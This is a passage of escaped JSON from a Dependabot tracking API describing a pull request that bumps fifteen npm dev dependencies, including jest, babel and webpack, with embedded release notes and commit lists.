href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev29.0.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSignificantly improved and sped up \u003ccode\u003egetComputedStyle()\u003c/code\u003e. Computed value rules are now applied across a broader set ...\n\n_Description has been truncated_","html_url":"https://github.com/forbiddenlink/color-studio/pull/23","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/forbiddenlink%2Fcolor-studio/issues/23","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/23/packages"}],"issue_packages":[{"old_version":"5.2.3","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-06-03T23:29:48.000Z","version_change":"5.2.3 → 5.2.4","issue":{"uuid":"4584423931","node_id":"PR_kwDOEYdz-s7idKop","number":2574,"state":"open","title":"Bump the devdependenciesminor group across 1 directory with 15 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-03T23:29:48.000Z","updated_at":"2026-06-03T23:29:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"devdependenciesminor","update_count":15,"packages":[{"name":"@changesets/cli","old_version":"2.30.0","new_version":"2.31.0","repository_url":"https://github.com/changesets/changesets"},{"name":"globals","old_version":"17.5.0","new_version":"17.6.0","repository_url":"https://github.com/sindresorhus/globals"},{"name":"jest","old_version":"30.3.0","new_version":"30.4.2","repository_url":"https://github.com/jestjs/jest"},{"name":"jest-environment-jsdom","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"ts-jest","old_version":"29.4.9","new_version":"29.4.11","repository_url":"https://github.com/kulshekhar/ts-jest"},{"name":"tsc-alias","old_version":"1.8.16","new_version":"1.8.17","repository_url":"https://github.com/justkey007/tsc-alias"},{"name":"@babel/core","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/plugin-transform-runtime","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/preset-env","old_version":"7.29.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"babel-jest","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"terser-webpack-plugin","old_version":"5.4.0","new_version":"5.6.0","repository_url":"https://github.com/webpack/minimizer-webpack-plugin"},{"name":"ts-loader","old_version":"9.5.4","new_version":"9.5.7","repository_url":"https://github.com/TypeStrong/ts-loader"},{"name":"webpack","old_version":"5.106.1","new_version":"5.107.0","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-cli","old_version":"7.0.2","new_version":"7.0.3","repository_url":"https://github.com/webpack/webpack-cli"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps the devdependenciesminor group with 15 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@changesets/cli](https://github.com/changesets/changesets) | `2.30.0` | `2.31.0` |\n| [globals](https://github.com/sindresorhus/globals) | `17.5.0` | `17.6.0` |\n| [jest](https://github.com/jestjs/jest/tree/HEAD/packages/jest) | `30.3.0` | `30.4.2` |\n| [jest-environment-jsdom](https://github.com/jestjs/jest/tree/HEAD/packages/jest-environment-jsdom) | `30.3.0` | `30.4.1` |\n| [ts-jest](https://github.com/kulshekhar/ts-jest) | `29.4.9` | `29.4.11` |\n| [tsc-alias](https://github.com/justkey007/tsc-alias) | `1.8.16` | `1.8.17` |\n| [@babel/core](https://github.com/babel/babel/tree/HEAD/packages/babel-core) | `7.29.0` | `7.29.7` |\n| [@babel/plugin-transform-runtime](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-runtime) | `7.29.0` | `7.29.7` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.5` | `7.29.7` |\n| [babel-jest](https://github.com/jestjs/jest/tree/HEAD/packages/babel-jest) | `30.3.0` | `30.4.1` |\n| [terser-webpack-plugin](https://github.com/webpack/minimizer-webpack-plugin) | `5.4.0` | `5.6.0` |\n| [ts-loader](https://github.com/TypeStrong/ts-loader) | `9.5.4` | `9.5.7` |\n| [webpack](https://github.com/webpack/webpack) | `5.106.1` | `5.107.0` |\n| [webpack-cli](https://github.com/webpack/webpack-cli) | `7.0.2` | `7.0.3` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n\n\nUpdates `@changesets/cli` from 2.30.0 to 2.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/changesets/changesets/releases\"\u003e@​changesets/cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​changesets/cli\u003c/code\u003e\u003ca href=\"https://github.com/2\"\u003e\u003ccode\u003e@​2\u003c/code\u003e\u003c/a\u003e.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1889\"\u003e#1889\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/96ca062272605c14f77a64043f50a0a3a278c57f\"\u003e\u003ccode\u003e96ca062\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Error on unsupported flags for individual CLI commands and print the matching command usage to make mistakes easier to spot.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1873\"\u003e#1873\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/42943b74d7a455ed03b93dd85e1c0a15f45db37f\"\u003e\u003ccode\u003e42943b7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Respond to \u003ccode\u003e--help\u003c/code\u003e on all subcommands. Previously, \u003ccode\u003e--help\u003c/code\u003e was only handled when it was the sole argument; passing it alongside a subcommand (e.g. \u003ccode\u003echangeset version --help\u003c/code\u003e) would silently execute the command instead. Now \u003ccode\u003e--help\u003c/code\u003e always exits early and prints per-command usage when a known subcommand is provided, or the general help text otherwise.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/d2121dc3d86b55f76de6022ccfcde843ed4b884a\"\u003e\u003ccode\u003ed2121dc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Fix npm auth for path-based registries during publish by preserving configured registry URLs instead of normalizing them.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1888\"\u003e#1888\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mixelburg\"\u003e\u003ccode\u003e@​mixelburg\u003c/code\u003e\u003c/a\u003e! - Fix several \u003ccode\u003echangeset version\u003c/code\u003e issues with workspace protocol dependencies. Valid explicit \u003ccode\u003eworkspace:\u003c/code\u003e ranges and aliases are no longer rewritten unnecessarily, and workspace path references are handled correctly during versioning.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1903\"\u003e#1903\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/5c4731fea82ce880500ac5e1c55ff372f7a4efe2\"\u003e\u003ccode\u003e5c4731f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Gracefully handle stale \u003ccode\u003enpm info\u003c/code\u003e data leading to duplicate publish attempts.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/changesets/changesets/pull/1867\"\u003e#1867\u003c/a\u003e \u003ca href=\"https://github.com/changesets/changesets/commit/f61e7166c349d4934e4acc9b47f3d028c212ecc1\"\u003e\u003ccode\u003ef61e716\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e! - Improved detection for \u003ccode\u003epublished\u003c/code\u003e state of prerelease-only packages without \u003ccode\u003elatest\u003c/code\u003e dist-tag on GitHub Packages registry.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/assemble-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/6\"\u003e\u003ccode\u003e@​6\u003c/code\u003e\u003c/a\u003e.0.10\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/get-dependents-graph\u003c/code\u003e\u003ca href=\"https://github.com/2\"\u003e\u003ccode\u003e@​2\u003c/code\u003e\u003c/a\u003e.1.4\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/apply-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/get-release-plan\u003c/code\u003e\u003ca href=\"https://github.com/4\"\u003e\u003ccode\u003e@​4\u003c/code\u003e\u003c/a\u003e.0.16\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​changesets/config\u003c/code\u003e\u003ca href=\"https://github.com/3\"\u003e\u003ccode\u003e@​3\u003c/code\u003e\u003c/a\u003e.1.4\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/9cce6db18ddecbf7f9cded45254b9905b19a7516\"\u003e\u003ccode\u003e9cce6db\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1897\"\u003e#1897\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/d2121dc3d86b55f76de6022ccfcde843ed4b884a\"\u003e\u003ccode\u003ed2121dc\u003c/code\u003e\u003c/a\u003e Fix npm auth for path-based registries during publish by preserving configure...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/036fdd451367226d0f2cd8af1e0a7f37a65e3464\"\u003e\u003ccode\u003e036fdd4\u003c/code\u003e\u003c/a\u003e Fix several \u003ccode\u003echangeset version\u003c/code\u003e issues with workspace protocol dependencies (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/5c4731fea82ce880500ac5e1c55ff372f7a4efe2\"\u003e\u003ccode\u003e5c4731f\u003c/code\u003e\u003c/a\u003e Gracefully handle stale \u003ccode\u003enpm info\u003c/code\u003e data leading to duplicate publish attempts...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/96ca062272605c14f77a64043f50a0a3a278c57f\"\u003e\u003ccode\u003e96ca062\u003c/code\u003e\u003c/a\u003e Error on unsupported flags for individual CLI commands (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1889\"\u003e#1889\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/42943b74d7a455ed03b93dd85e1c0a15f45db37f\"\u003e\u003ccode\u003e42943b7\u003c/code\u003e\u003c/a\u003e fix(cli): respond to \u003ccode\u003e--help\u003c/code\u003e on all subcommands (\u003ca href=\"https://redirect.github.com/changesets/changesets/issues/1873\"\u003e#1873\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/changesets/changesets/commit/f61e7166c349d4934e4acc9b47f3d028c212ecc1\"\u003e\u003ccode\u003ef61e716\u003c/code\u003e\u003c/a\u003e Improved detection for \u003ccode\u003epublished\u003c/code\u003e state of prerelease-only packages without ...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/changesets/changesets/compare/@changesets/cli@2.30.0...@changesets/cli@2.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `globals` from 17.5.0 to 17.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sindresorhus/globals/releases\"\u003eglobals's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev17.6.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate globals (2026-05-01) (\u003ca href=\"https://redirect.github.com/sindresorhus/globals/issues/343\"\u003e#343\u003c/a\u003e)  00a4dd9\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\"\u003ehttps://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/globals/commit/6b15870f1c08b60b5b57afe45a703d9ed0be39bc\"\u003e\u003ccode\u003e6b15870\u003c/code\u003e\u003c/a\u003e 17.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/globals/commit/00a4dd9821830a9b044798120e86b1bb1a54648d\"\u003e\u003ccode\u003e00a4dd9\u003c/code\u003e\u003c/a\u003e Update globals (2026-05-01) (\u003ca href=\"https://redirect.github.com/sindresorhus/globals/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sindresorhus/globals/compare/v17.5.0...v17.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jest` from 30.3.0 to 30.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/releases\"\u003ejest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev30.4.2\u003c/h2\u003e\n\u003ch1\u003eFixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Fix named imports from CJS modules whose \u003ccode\u003emodule.exports\u003c/code\u003e is a function with own-property exports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16150\"\u003e#16150\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.1...v30.4.2\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.1...v30.4.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.1\u003c/h2\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.0\u003c/h2\u003e\n\u003cp\u003eBig release! 😀\u003c/p\u003e\n\u003cp\u003eMain feature is a rewrite of our custom runtime in preparation for stabilisation of native support of ESM. As part of that work \u003ccode\u003erequire(esm)\u003c/code\u003e module is now supported on Node 24.9+ (still requires \u003ccode\u003e--experimental-vm-modules\u003c/code\u003e like before).\u003c/p\u003e\n\u003cp\u003eIn addition we now support fake timers for the recently released \u003ccode\u003eTemporal\u003c/code\u003e API in Node v26.\u003c/p\u003e\n\u003cp\u003eReact 19 is also supported properly in \u003ccode\u003epretty-format\u003c/code\u003e, meaning snapshots of React components now work like they should.\u003c/p\u003e\n\u003cp\u003eDue to all the changes, there might be regressions that snuck in. Please report them!\u003c/p\u003e\n\u003cp\u003eFull list of changes below\u003c/p\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/blob/main/CHANGELOG.md\"\u003ejest's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e30.4.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Fix named imports from CJS modules whose \u003ccode\u003emodule.exports\u003c/code\u003e is a function with own-property exports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16150\"\u003e#16150\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.1\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca 